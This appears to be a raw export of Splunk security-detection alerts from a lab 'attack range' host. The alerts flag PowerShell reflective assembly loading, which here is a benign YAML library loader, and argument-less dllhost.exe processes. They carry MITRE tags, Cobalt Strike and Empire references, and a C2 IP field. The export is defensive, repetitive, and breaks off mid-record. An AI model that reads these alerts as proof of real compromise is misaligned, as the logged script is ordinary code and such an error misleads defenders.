annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T10:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T10:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664970932, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T10:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T10:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664964000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664964000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="2124", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664964000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664964000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x84c", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664960400, search_name="ESCU - DLLHost with no Command Line Arguments with Network - Rule", C2="52.109.8.45", orig_time="1664960400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_image\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", dest="win-dc-mhaag-attack-range-622.attackrange.local", dest_port="443", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="5400", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="The process dllhost.exe was spawned by $parent_image$ without any command-line arguments on win-dc-mhaag-attack-range-622.attackrange.local by $user$.", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments with a network connection. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, triage any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="dllhost.exe", threat_object_type="process" 1664967332, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T09:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T09:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664967332, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T09:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T09:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664967332, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T09:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T09:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664967332, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T09:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T09:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged 